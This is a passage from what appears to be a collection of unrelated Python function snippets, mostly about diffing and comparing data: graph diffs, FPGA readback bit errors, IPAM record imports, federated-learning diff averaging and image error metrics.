#print(\"The outputs: k_mins, LR denominator, LR numerator, 1 / LR (or alpha').\")\r\n #print(self.k_min_sched, '\\n', self.pr_H0_sched, '\\n', self.pr_Ha_sched, '\\n', \r\n #self.risk_sched)\r\n #print(\"Output suppressed. Use instance variables k_min_sched, pr_H0_sched, pr_Ha_sched, risk_sched\")\r\n\r\n #print(\"Time elapsed:\", datetime.now() - time)\r", "def diff_report(self) -> str:\n graph_a = self.graph_a\n graph_b = self.graph_b\n\n graph_a_str = str(graph_a)\n graph_b_str = str(graph_b)\n\n if graph_a_str == graph_b_str:\n return \"\"\n\n graph_diff = difflib.ndiff(\n graph_a_str.splitlines(True), graph_b_str.splitlines(True)\n )\n graph_diff_report = [\"Graph diff:\", self._indent(\"\".join(graph_diff))]\n\n for node_a, node_b in itertools.zip_longest(graph_a.nodes(), graph_b.nodes()):\n if str(node_a) != str(node_b):\n graph_diff_report.append(\"First diverging operator:\")\n node_diff = difflib.ndiff(\n str(node_a).splitlines(True), str(node_b).splitlines(True)\n )\n source_printout = [\"node diff:\", self._indent(\"\".join(node_diff))]\n\n stack_a = node_a.sourceRange() if node_a else None\n if stack_a:\n source_printout.extend(\n [\"Former source location:\", self._indent(str(stack_a))]\n )\n stack_b = node_b.sourceRange() if node_b else None\n if stack_b:\n source_printout.extend(\n [\"Latter source location:\", self._indent(str(stack_b))]\n )\n\n graph_diff_report.extend(source_printout)\n\n break\n\n return \"\\n\".join(graph_diff_report)", "def compare_readbacks(golden_path,\n readback_path):\n\n errors_cram = 0\n seu_01 = 0\n seu_10 = 0\n mbu_pos = 0\n mbu_neg = 0\n mbu_delta = []\n\n golden = open(golden_path, \"rb\")\n readback = open(readback_path, \"rb\")\n\n golden_array = golden.read()\n readback_array = readback.read()\n print(len(golden_array))\n print(len(readback_array))\n\n for i in range(0, len(golden_array)):\n if golden_array[i] != readback_array[i]:\n gold_byte, = struct.unpack(\"B\", golden_array[i])\n gold_byte_ones = bin(gold_byte).count(\"1\")\n readback_byte, = struct.unpack(\"B\", readback_array[i])\n readback_byte_ones = bin(readback_byte).count(\"1\")\n\n delta = gold_byte_ones - readback_byte_ones\n\n if delta == -1:\n seu_01 += 1\n elif delta == 1:\n seu_10 += 1\n elif delta > 1:\n mbu_pos += 1\n mbu_delta.append(delta)\n print(\"\\n\\n\\n\\n\\n DUPA \\n\\n\\n\\n\\n\")\n elif delta < -1:\n mbu_neg += 1\n mbu_delta.append(delta)\n print(\"\\n\\n\\n\\n\\n DUPA \\n\\n\\n\\n\\n\")\n\n print(gold_byte,\n readback_byte,\n delta)\n\n errors_cram += 1\n\n print(\"\\n\\nseu_01: {0}\\nseu_10: {1}\\nmbu_01: {2}\\nmbu_10: {3}\".format(seu_01, seu_10, mbu_neg, mbu_pos))\n print(mbu_delta)\n golden.close()\n readback.close()\n\n return errors_cram", "def PostProcessDiff(self, diff):\r\n return diff", "def analyze_data():\n attack_free_1 = load_messages(\"data/csv/Attack_free_dataset.csv\", verbose=True)\n\n impersonation_1 = load_messages(\"data/csv/170907_impersonation.csv\", verbose=True)\n impersonation_2 = load_messages(\"data/csv/170907_impersonation_2.csv\", verbose=True)\n impersonation_3 = load_messages(\"data/csv/Impersonation_attack_dataset.csv\", verbose=True)\n\n information = {\n \"Mean time between normal messages\":\n get_mean_time_between_normal_messages(attack_free_1),\n \"Mean time between split messages\":\n get_mean_time_between_split_messages(attack_free_1),\n \"Sum of removed intervals in '170907_impersonation.csv'\":\n get_sum_of_removed_intervals(impersonation_1, 250),\n \"Sum of removed intervals in '170907_impersonation_2.csv'\":\n get_sum_of_removed_intervals(impersonation_2, 250),\n \"Sum of removed intervals in 'Impersonation_attack_dataset.csv'\":\n get_sum_of_removed_intervals(impersonation_3, 250),\n \"Index of split in '170907_impersonation.csv'\":\n get_index_before_time(impersonation_1, 250 - 23.434627056121826),\n \"Index of split in '170907_impersonation_2.csv'\":\n get_index_before_time(impersonation_2, 250 - 20.980855226516724),\n \"Index of split in 'Impersonation_attack_dataset.csv'\":\n get_index_before_time(impersonation_3, 250 - 2.1056361198425293)\n }\n\n return information", "def compare_old_and_new_status_files():\n rdict=dict()\n mastcontrol=dirutil.get_mast_control_path()\n mastscratch=dirutil.get_mast_scratch_path()\n recipedirs=dirutil.immediate_subdirs(os.path.join(mastcontrol,\"statusfiles\"))\n for recipedir in recipedirs:\n mystatus=\"unknown\"\n rdict[recipedir]=dict()\n changelist=list()\n if not os.path.exists(os.path.join(mastscratch,recipedir)):\n mystatus=\"archived\"\n else:\n scratchstatusfile = MASTFile(os.path.join(mastscratch,recipedir,\"status.txt\"))\n controlstatusfile = MASTFile(os.path.join(mastcontrol,\"statusfiles\",recipedir,\"status.txt\"))\n if scratchstatusfile.data == controlstatusfile.data:\n mystatus=\"unchanged\"\n else:\n mystatus=\"changed\"\n myidx=0\n while myidx < len(scratchstatusfile.data):\n oldline = controlstatusfile.data[myidx]\n newline = scratchstatusfile.data[myidx]\n if \"#\" in oldline:\n pass\n else:\n ingred = oldline.split(\":\")[0].strip()\n oldstatus = oldline.split(\":\")[1].strip()\n newstatus = newline.split(\":\")[1].strip()\n if (oldstatus == \"P\") and (newstatus == \"P\"):\n rdict[recipedir][ingred]=\"AVOID\"\n elif (oldstatus == \"C\") and (newstatus == \"C\"):\n rdict[recipedir][ingred]=\"AVOID\"\n else:\n rdict[recipedir][ingred]=\"send\"\n myidx = myidx + 1\n rdict[recipedir][\"MAIN\"]=mystatus\n return rdict", "def _get_diff_data(views_index, src_data, ea_index, ddi_data):\n\n def _add_and_del():\n \"\"\"Handles the add's and del import's.\"\"\"\n for add_or_del_row in src_data:\n # Add Check.\n if 'add' in add_or_del_row[0]:\n if add_or_del_row[1] in \\\n ddi_data[views_index[add_or_del_row[15]]]:\n errored_list.append(add_or_del_row)\n continue\n else:\n import_add.append(add_or_del_row)\n continue\n\n # delete check\n if 'del' in add_or_del_row[0] and add_or_del_row[1] in \\\n ddi_data[views_index[add_or_del_row[15]]][\n add_or_del_row[1]]:\n import_delete.append([add_or_del_row[15],\n add_or_del_row[1],\n add_or_del_row[14]])\n continue\n unused_list.append(add_or_del_row)\n\n def _ea_in_disposition_col0_and_empty_ipr_d_col():\n \"\"\"Disposition col0 check and an empty ipr disposition column.\"\"\"\n for disposition_row in unused_list:\n # Check disposition\n ddi_index = views_index[disposition_row[15]]\n # Checks disposition column value and checks for IPR D value.\n # If no IPR D in extattrs dict stores the src data for updates.\n if disposition_row[0] in ea_ipr_d_values and 'IPR Designation' not\\\n in ddi_data[ddi_index][disposition_row[1]]['extattrs']:\n import_merge_disposition.append(\n [disposition_row[15],\n disposition_row[1],\n disposition_row[14],\n disposition_row[0]])\n\n def _comment_check():\n \"\"\"Function for checking ipam comment attribute.\"\"\"\n for comment_row in unused_list:\n ddi_index = views_index[comment_row[15]]\n # Checks for empty src value and empty ddi data value.\n # Continues if True.\n if 'comment' not in ddi_data[ddi_index][comment_row[1]]\\\n and comment_row[12] == '':\n continue\n # Checks a non-empty src value and updates if an\n # empty ddi data value.\n if 'comment' not in ddi_data[ddi_index][comment_row[1]] and \\\n comment_row[12] != '':\n import_merge.append([comment_row[15],\n comment_row[1],\n comment_row[14],\n {'comment': comment_row[12]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if comment_row[12] != \\\n ddi_data[ddi_index][comment_row[1]]['comment']:\n import_override.append([comment_row[15],\n comment_row[1],\n comment_row[14],\n {'comment': comment_row[12]}])\n continue\n\n def _non_listed_ea_columns_check():\n \"\"\"Checks non-listable ea columns.\"\"\"\n for ea_row in unused_list:\n # dup Check in disposition\n ddi_index = views_index[ea_row[15]]\n for key, value in ea_index.items():\n # ea attributes that could be listed.\n if key == 'Datacenter' or key == 'IPR Designation':\n continue\n # Checks for empty src value and empty ddi data value.\n # Continues if True.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] and \\\n ea_row[value] in ['', 'DDI']:\n continue\n # Checks a non-empty src value and updates if an\n # empty ddi data value.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] \\\n and ea_row[value] not in ['', 'DDI']:\n import_merge.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if ea_row[value] != \\\n ddi_data[ddi_index][\n ea_row[1]]['extattrs'][key]['value']:\n import_override.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue\n\n def _listed_ea_column_check():\n \"\"\"Checks non-listable ea columns.\"\"\"\n for ea_row in unused_list:\n ddi_index = views_index[ea_row[15]]\n # This check is performed in\n # _ea_in_disposition_col0_and_empty_ipr_d_col\n if ea_row[0] in ea_ipr_d_values and \\\n 'IPR Designation' not in \\\n ddi_data[ddi_index][ea_row[1]]['extattrs']:\n continue\n # Update IPR D src column with ea_row[0] for processing.\n # WORK IN PROGRESS\n elif ea_row[0] in ea_ipr_d_values and 'IPR Designation' \\\n in ddi_data[ddi_index][ea_row[1]]['extattrs']:\n pass\n # Processing listable columns.\n for key, value in ea_index.items():\n # Skip's unused keys.\n if key not in ['Datacenter', 'IPR Designation']:\n continue\n # Check for blank column and blank source column.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] and \\\n ea_row[value] in ['', 'DDI']:\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n if key == 'IPR Designation':\n if ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] in ea_ipr_d_values:\n ea_row[16] = ea_row[16] + ',' + ea_row[0]\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[16]}])\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n elif ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] not in ea_ipr_d_values:\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[0]}])\n continue\n# # Check Disposition col. and if IPR D listed value needs\n# # updating. On listed IPR D values.\n# if ea_row[0].lower().strip() in ea_ipr_d_values \\\n# and ',' in ea_row[16]:\n# temp_list = ea_row[16].split(',')\n# temp_list = [x.strip() for x in temp_list]\n# if ea_row[0].lower().strip() in temp_list:\n# continue\n# else:\n# temp_list.append(ea_row[0].lower().strip())\n# temp_dict_override.update({key: temp_list})\n# import_override.append([ea_row[15].strip(),\n# ea_row[1].strip(),\n# ea_row[14].strip(),\n# temp_dict_override])\n# continue\n\n # Builds dataset for non-listed values. Final Step.\n # If key not in ddi data and src value is not none.\n # Assign to merge.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] \\\n and ea_row[value] not in ['', 'DDI']:\n import_merge.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[value]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if ea_row[value] != \\\n ddi_data[ddi_index][\n ea_row[1]]['extattrs'][key]['value']:\n import_override.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue\n\n # Local scope variables.\n import_add = []\n import_delete = []\n import_merge = []\n import_override = []\n import_merge_disposition = []\n unused_list = []\n errored_list = []\n # Check for extensible attribute in Disposition column[0].\n # If found and IPR D column is empty append for writing.\n ea_ipr_d_values = ['leaf', 'dup', 'followup', 'decom', 'adv', 'divest',\n 'ignore', 're-ip', 'parent', 'drop reserve']\n _add_and_del()\n _ea_in_disposition_col0_and_empty_ipr_d_col()\n _comment_check()\n _non_listed_ea_columns_check()\n _listed_ea_column_check()\n return import_add, \\\n import_delete, \\\n import_merge_disposition, \\\n import_merge, \\\n import_override", "def analyze_state_changes(self):\n graph = self._graph\n lost_chunks = set(self._lost_chunks)\n op_states = self._op_states\n\n # mark lost virtual nodes as lost when some preds are lost\n for n in graph:\n if not isinstance(n.op, VirtualOperand) \\\n or op_states.get(n.op.key) == OperandState.UNSCHEDULED:\n continue\n if any(pred.key in lost_chunks for pred in graph.iter_predecessors(n)):\n lost_chunks.add(n.key)\n\n # collect operands with lost data\n op_key_to_chunks = defaultdict(list)\n lost_ops = set()\n for n in graph:\n op_key_to_chunks[n.op.key].append(n)\n if n.key in lost_chunks:\n lost_ops.add(n.op.key)\n\n # check data on finished operands. when data lost, mark the operand\n # and its successors as affected.\n affected_op_keys = set()\n for op_key in lost_ops:\n affected_op_keys.add(op_key)\n for n in op_key_to_chunks[op_key]:\n affected_op_keys.update(succ.op.key for succ in graph.iter_successors(n))\n\n # scan the graph from bottom and reassign new states\n new_states = dict()\n for chunk in graph.topological_iter(reverse=True):\n op_key = chunk.op.key\n if chunk.op.key not in affected_op_keys:\n continue\n\n can_be_ready = True\n stop_spread_states = (OperandState.RUNNING, OperandState.FINISHED)\n for pred in graph.iter_predecessors(chunk):\n pred_op_key = pred.op.key\n # mark affected, if\n # 1. data of the operand is lost\n # 2. state does not hold data, or data is lost,\n # for instance, operand is freed.\n if pred.key in lost_chunks or op_states.get(pred_op_key) not in stop_spread_states:\n affected_op_keys.add(pred_op_key)\n can_be_ready = False\n\n # update state given data preservation of prior nodes\n chunk_op_state = op_states.get(op_key)\n if can_be_ready and chunk_op_state != OperandState.READY:\n new_states[op_key] = OperandState.READY\n elif not can_be_ready and chunk_op_state != OperandState.UNSCHEDULED:\n new_states[op_key] = OperandState.UNSCHEDULED\n\n op_states.update(new_states)\n return new_states", "def __diff_internal(self):\n assert self.p > 0, \"order of Bspline must be > 0\" # we already handle the other case in diff()\n\n # https://www.cs.mtu.edu/~shene/COURSES/cs3621/NOTES/spline/B-spline/bspline-derv.html\n #\n t = self.knot_vector\n p = self.p\n bi = BsplineBasis(t[:-1], p - 1)\n bip1 = BsplineBasis(t[1:], p - 1)\n\n numer1 = +p\n numer2 = -p\n denom1 = t[p:-1] - t[:-(p + 1)]\n denom2 = t[(p + 1):] - t[1:-p]\n\n with np.errstate(divide='ignore', invalid='ignore'):\n ci = np.where(denom1 != 0., (numer1 / denom1), 0.)\n cip1 = np.where(denom2 != 0., (numer2 / denom2), 0.)\n\n return (ci, bi), (cip1, bip1)", "def comparison():\n path = \"Data/data_fronts/\"\n path1 = \"Results/labelled_images1010/fronts/\"\n\n #computes the areas for the first frame in order to normalize the other areas\n pol0 = pd.DataFrame(pd.read_csv(path1 + \"fronts_labelled.m.0.png.txt\",sep =' '))\n #makes an object polygon in order to compute the area\n pol0 = np.array(pol0)\n pol0 = Polygon(pol0)\n\n polsx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_1_sx.txt\",sep ='\\t'))\n polsx.columns = [\"y\",\"x\"]\n poldx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_1_dx.txt\",sep ='\\t'))\n poldx.columns = [\"y\",\"x\"]\n #makes an object polygon in order to compute the area\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n pol1 = Polygon(polsx)\n\n\n areas = []\n areas_hand = []\n #computes the areas for all the frames\n for i in range(42):\n pol = pd.DataFrame(pd.read_csv(path1 + \"fronts_labelled.m.\"+str(i)+\".png.txt\",sep =' '))\n pol = np.array(pol)\n pol = Polygon(pol)\n #normalize the areas with respect to the area of the first frame\n areas.append(pol.area/pol0.area)\n\n polsx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_sx.txt\",sep ='\\t'))\n polsx.columns = [\"y\",\"x\"]\n poldx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_dx.txt\",sep ='\\t'))\n poldx.columns = [\"y\",\"x\"]\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n\n pol2 = Polygon(polsx)\n #normalize the areas with respect to the area of the first frame\n areas_hand.append(pol2.area/pol1.area)\n #returns the two arrays with the normalized areas\n return np.array(areas) , np.array(areas_hand)", "def fast_comparison(path = \"Data/data_fronts/\",path1 = \"Results/modified_images/fronts/\"):\n #computes the areas for the first frame in order to normalize the other areas\n pol0dx = grid(path1+\"m_0.png_dx.txt\")\n pol0dx.columns = [\"y\",\"x\"]\n pol0sx = grid(path1+\"m_0.png_sx.txt\")\n pol0sx.columns = [\"y\",\"x\"]\n if pol0dx[\"x\"][0]>100:\n pol0dx = pol0dx.reindex(index=pol0dx.index[::-1])\n if pol0sx[\"x\"][0]<100:\n pol0sx = pol0sx.reindex(index=pol0sx.index[::-1])\n pol0sx = pol0sx.append(pol0dx)\n pol0sx = np.array(pol0sx)\n pol0 = Polygon(pol0sx)\n\n polsx = grid(path + \"Sham_8-2-18_Field 5_1_sx.txt\",l = 633,delimiter ='\\t')\n polsx.columns = [\"y\",\"x\"]\n polsx[\"y\"] =polsx[\"y\"]/844*1600\n polsx[\"x\"] =polsx[\"x\"]/633*1200\n poldx = grid(path + \"Sham_8-2-18_Field 5_1_dx.txt\",l = 633,delimiter ='\\t')\n poldx.columns = [\"y\",\"x\"]\n poldx[\"y\"] =poldx[\"y\"]/844*1600\n poldx[\"x\"] =poldx[\"x\"]/633*1200\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n #makes an object polygon in order to compute the area\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n pol1 = Polygon(polsx)\n\n\n areas = []\n areas_hand = []\n #computes the areas for all the frames\n for i in range(42):\n poldx = grid(path1+\"m_\"+str(i)+\".png_dx.txt\")\n poldx.columns = [\"y\",\"x\"]\n polsx = grid(path1+\"m_\"+str(i)+\".png_sx.txt\")\n polsx.columns = [\"y\",\"x\"]\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n\n #makes an object polygon in order to compute the area\n\n pol = Polygon(polsx)\n\n #normalize the areas with respect to the area of the first frame\n areas.append(pol.area/pol0.area)\n\n polsx = grid(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_sx.txt\",l = 633,delimiter ='\\t')\n polsx.columns = [\"y\",\"x\"]\n polsx[\"y\"] =polsx[\"y\"]/844*1600\n polsx[\"x\"] =polsx[\"x\"]/633*1200\n poldx = grid(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_dx.txt\",l = 633,delimiter='\\t')\n poldx.columns = [\"y\",\"x\"]\n poldx[\"y\"] =poldx[\"y\"]/844*1600\n poldx[\"x\"] =poldx[\"x\"]/633*1200\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n\n pol2 = Polygon(polsx)\n #normalize the areas with respect to the area of the first frame\n areas_hand.append(pol2.area/pol1.area)\n #returns the two arrays with the normalized areas\n return np.array(areas) , np.array(areas_hand)", "def _analyze(self):\r\n if self.value is None or self.value == self.previous:\r\n pass\r\n elif self._operation == \"add\":\r\n self._additions = self.value\r\n elif self._operation == \"remove\":\r\n self._removals = self.value\r\n elif self.previous is None:\r\n self._assignments = self.value\r\n else:\r\n # partial update time\r\n self._additions = (self.value - self.previous) or None\r\n self._removals = (self.previous - self.value) or None\r\n self._analyzed = True", "def process_traces(subdirs,dates,load_path):\n\n N = 60*60*24*len(dates)*10\n\n firing_rates_storage = np.zeros((N))\n var_storage = np.zeros((N))\n position_storage = np.zeros((N,2))\n firing_rates_storage[:] = np.nan\n var_storage[:] = np.nan\n timestamps = np.zeros((N))\n clusters = np.zeros((N))\n pk_max = 0\n n=0\n\n for subdir,date in zip(subdirs,dates):\n \n dpk = pk_max \n path = load_path+'/%s/'%subdir\n file = [i for i in os.listdir(path) if '.pkl' in i] \n \n if len(file) == 0:\n continue\n \n pd_ob = pkl.load(open(path+file[0],'rb'))\n \n positions = pd_ob['positions']\n sts = pd_ob['sts']\n isis = pd_ob['isis']\n fsts = pd_ob['fsts']\n fisis = pd_ob['fisis']\n et = pd_ob['et']\n ep = pd_ob['ep']\n \n max_time = 0\n for k,v in sts.items():\n max_time = max(max_time,np.max(v))\n \n for t in np.arange(0,np.floor(max_time)):\n\n for i,pk in enumerate(sts.keys()):\n if np.count_nonzero((sts[pk]>t) & (sts[pk]<(t+1))) > 1:\n\n p = positions[pk][:-1]\n\n x = sts[pk]\n y = isis[pk]\n fx = fsts[pk]\n fy = fisis[pk]\n\n firing_rates_storage[n] = np.nanmean(y[(x>t) & (x<t+1)])\n var_storage[n] = np.nanvar(y[(x>t) & (x<t+1)])\n position_storage[n] = np.nanmean(p[(x>t) & (x<t+1)],axis=0)\n timestamps[n] = (date + timedelta(0,int(t))).timestamp()\n clusters[n] = pk + dpk\n n=n+1\n pk_max = max(pk_max,pk+dpk)\n\n firing_rates_storage = firing_rates_storage[:n]\n var_storage = var_storage[:n]\n position_storage = position_storage[:n]\n timestamps = timestamps[:n]\n clusters = clusters[:n]\n\n np.savez(load_path+'processed_traces.npz',frs=firing_rates_storage,vs=var_storage,pos=position_storage,ts=timestamps,cl=clusters)\n return 0", "def test_calculate_indicates_removal_of_unrelated_files(self, m_free):\n # files are unrelated to backup\n walk_paths = {'/dst': [('/dst', ['/a'], ['x0.txt']),\n ('/dst/a', [], ['x1.txt'])]}\n copied_indexes = []\n reconciler = keepfilesreconciler.KeepFilesReconciler(self.resolver, self.options)\n with filesystemhelpers.mock_walk(walk_paths):\n filepaths = reconciler.calculate(self.copyfiles, copied_indexes)\n assert filepaths == {'/dst/a/x1.txt', '/dst/x0.txt'}", "def compare_old_and_new_change_status_files():\n rdict=dict()\n mastcontrol=dirutil.get_mast_control_path()\n mastscratch=dirutil.get_mast_scratch_path()\n recipedirs=dirutil.immediate_subdirs(os.path.join(mastcontrol,\"changestatusfiles\"))\n for recipedir in recipedirs:\n mystatus=\"unknown\"\n rdict[recipedir]=dict()\n changelist=list()\n if not os.path.exists(os.path.join(mastscratch,recipedir)):\n mystatus=\"archived\"\n else:\n ingreddirs = dirutil.immediate_subdirs(os.path.join(mastcontrol,\"changestatusfiles\",recipedir))\n for ingreddir in ingreddirs:\n scratchstatusfile = MASTFile(os.path.join(mastscratch,recipedir,ingreddir,\"change_status.txt\"))\n controlstatusfile = MASTFile(os.path.join(mastcontrol,\"changestatusfiles\",recipedir,ingreddir,\"change_status.txt\"))\n if scratchstatusfile.data == controlstatusfile.data:\n mystatus=\"unchanged\"\n else:\n mystatus=\"changed\"\n rdict[recipedir][ingreddir]=\"send\"\n rdict[recipedir][\"MAIN\"]=mystatus\n return rdict", "def check_unstaged_changes(self):\n pass", "def _average_plan_diffs(self, server_config: dict, cycle):\n logging.info(\"start diffs averaging!\")\n logging.info(\"cycle: %s\" % str(cycle))\n logging.info(\"fl id: %d\" % cycle.fl_process_id)\n _model = model_manager.get(fl_process_id=cycle.fl_process_id)\n logging.info(\"model: %s\" % str(_model))\n model_id = _model.id\n logging.info(\"model id: %d\" % model_id)\n _checkpoint = model_manager.load(model_id=model_id)\n logging.info(\"current checkpoint: %s\" % str(_checkpoint))\n model_params = model_manager.unserialize_model_params(_checkpoint.values)\n logging.info(\"model params shapes: %s\" % str([p.shape for p in model_params]))\n\n # Here comes simple hardcoded avg plan\n # it won't be always possible to retrieve and unserialize all diffs due to memory constrains\n # needs some kind of iterative or streaming approach,\n # e.g.\n # for diff_N in diffs:\n # avg = avg_plan(avg, N, diff_N)\n # and the plan is:\n # avg_next = (avg_current*(N-1) + diff_N) / N\n reports_to_average = self._worker_cycles.query(\n cycle_id=cycle.id, is_completed=True\n )\n diffs = [\n model_manager.unserialize_model_params(report.diff)\n for report in reports_to_average\n ]\n\n # Again, not sure max_workers == number of diffs to avg\n diffs = random.sample(diffs, server_config.get(\"max_workers\"))\n\n raw_diffs = [\n [diff[model_param] for diff in diffs]\n for model_param in range(len(model_params))\n ]\n logging.info(\"raw diffs lengths: %s\" % str([len(row) for row in raw_diffs]))\n\n sums = [reduce(th.add, param) for param in raw_diffs]\n logging.info(\"sums shapes: %s\" % str([sum.shape for sum in sums]))\n\n diff_avg = [th.div(param, len(diffs)) for param in sums]\n logging.info(\"diff_avg shapes: %s\" % str([d.shape for d in diff_avg]))\n\n # apply avg diff!\n _updated_model_params = [\n model_param - diff_param\n for model_param, diff_param in zip(model_params, diff_avg)\n ]\n logging.info(\n \"_updated_model_params shapes: %s\"\n % str([p.shape for p in _updated_model_params])\n )\n\n # make new checkpoint\n serialized_params = model_manager.serialize_model_params(_updated_model_params)\n _new_checkpoint = model_manager.save(model_id, serialized_params)\n logging.info(\"new checkpoint: %s\" % str(_new_checkpoint))\n\n # mark current cycle completed\n cycle.is_completed = True\n self._cycles.update()\n\n completed_cycles_num = self._cycles.count(\n fl_process_id=cycle.fl_process_id, is_completed=True\n )\n logging.info(\"completed_cycles_num: %d\" % completed_cycles_num)\n max_cycles = server_config.get(\"num_cycles\")\n if completed_cycles_num < max_cycles:\n # make new cycle\n _new_cycle = self.create(cycle.fl_process_id, cycle.version)\n logging.info(\"new cycle: %s\" % str(_new_cycle))\n else:\n logging.info(\"FL is done!\")", "def compute_error_metrics(original, altered, results, converterOpts=None):\n import math\n from tempfile import TemporaryDirectory\n\n import large_image_source_tiff\n import numpy as np\n import packaging\n import skimage.metrics\n\n lastlog = 0\n with TemporaryDirectory() as tempDir:\n # TODO: check if the original is geospatial; if so appropriate options\n tempPath = os.path.join(tempDir, os.path.basename(original) + '.tiff')\n orig = large_image_converter.convert(original, tempPath, compression='lzw')\n tsOrig = large_image_source_tiff.open(orig)\n numFrames = len(tsOrig.getMetadata().get('frames', [0]))\n tsAlt = large_image_source_tiff.open(altered)\n mse = 0\n ssim = 0\n ssim_count = 0\n maxval = 0\n maxdiff = 0\n sum = 0\n count = 0\n tileSize = 2048\n for frame in range(numFrames):\n tiAlt = tsAlt.tileIterator(tile_size=dict(width=tileSize), frame=frame)\n for tileOrig in tsOrig.tileIterator(tile_size=dict(width=tileSize), frame=frame):\n tileAlt = next(tiAlt)\n do = tileOrig['tile']\n da = tileAlt['tile']\n if do.dtype != da.dtype and da.dtype == np.uint8:\n da = da.astype(int) * 257\n do = do.astype(int)\n da = da.astype(int)\n maxval = max(maxval, do.max(), da.max())\n if do.shape[2] > da.shape[2]:\n do = do[:, :, :da.shape[2]]\n if da.shape[2] > do.shape[2]:\n da = da[:, :, :do.shape[2]]\n diff = np.absolute(do - da)\n maxdiff = max(maxdiff, diff.max())\n sum += diff.sum()\n count += diff.size\n last_mse = np.mean(diff ** 2)\n mse += last_mse * diff.size\n last_ssim = 0\n try:\n kwargs = {}\n if (packaging.version.parse(skimage.__version__) >=\n packaging.version.parse('0.19')):\n kwargs['channel_axis'] = 2 if len(do.shape) > 2 else None\n else:\n kwargs['multichannel'] = len(do.shape) > 2\n last_ssim = skimage.metrics.structural_similarity(\n do.astype(float), da.astype(float),\n data_range=255 if tileOrig['tile'].dtype == np.uint8 else 65535,\n gaussian_weights=True, sigma=1.5, use_sample_covariance=False,\n **kwargs)\n ssim += last_ssim * diff.size\n ssim_count += diff.size\n except ValueError:\n pass\n if time.time() - lastlog >= 10 and ssim_count:\n logger.debug(\n 'Calculating error (%d/%d): rmse %4.2f ssim %6.4f '\n 'last rmse %4.2f ssim %6.4f',\n tileOrig['tile_position']['position'] + 1 +\n tileOrig['iterator_range']['position'] * frame,\n tileOrig['iterator_range']['position'] * numFrames,\n (mse / count) ** 0.5, ssim / ssim_count,\n last_mse ** 0.5, last_ssim)\n lastlog = time.time()\n results['maximum_error'] = maxdiff\n results['average_error'] = sum / count\n results['rmse'] = (mse / count) ** 0.5\n results['psnr'] = 10 * math.log10(\n maxval ** 2 / (mse / count)) if mse else None\n if ssim_count:\n results['ssim'] = ssim / ssim_count\n logger.debug('Calculated error: rmse %4.2f psnr %3.1f ssim %6.4f',\n results['rmse'], results['psnr'] or 0, results['ssim'])", "def get_resulting_diffs():\n diff_dirpath = application.join_abs_path(\n EMPTY_TEST_DIR, application.OUTPUT_DIR_NAME)\n diffleft_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_LEFT_FILENAME)\n diffright_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_RIGHT_FILENAME)\n\n diff_left = read_gzip_file_lines_into_set(diffleft_filename)\n diff_right = read_gzip_file_lines_into_set(diffright_filename)\n\n return diff_left, diff_right", "def avg_metric(sharp_path, deblurred_path): # TODO1 do multiprocessing in those methods\n sum_psnr = 0\n sum_mse = 0\n sum_ssim = 0\n\n # List all files\n files_orig = [f for f in listdir(sharp_path) if isfile(join(sharp_path, f))]\n files_deb = [f for f in listdir(deblurred_path) if isfile(join(deblurred_path, f))]\n\n count = 0\n for orig, deb in zip(files_orig, files_deb):\n orig_fn = join(sharp_path, orig)\n deb_fn = join(deblurred_path, deb)\n # Load images\n orig_img = cv2.imread(orig_fn)\n deb_img = cv2.imread(deb_fn)\n orig_img = np.divide(orig_img, 255)\n deb_img = np.divide(deb_img, 255)\n\n # Compute metrics\n sum_psnr += peak_signal_noise_ratio(orig_img, deb_img)\n sum_mse += mean_squared_error(orig_img, 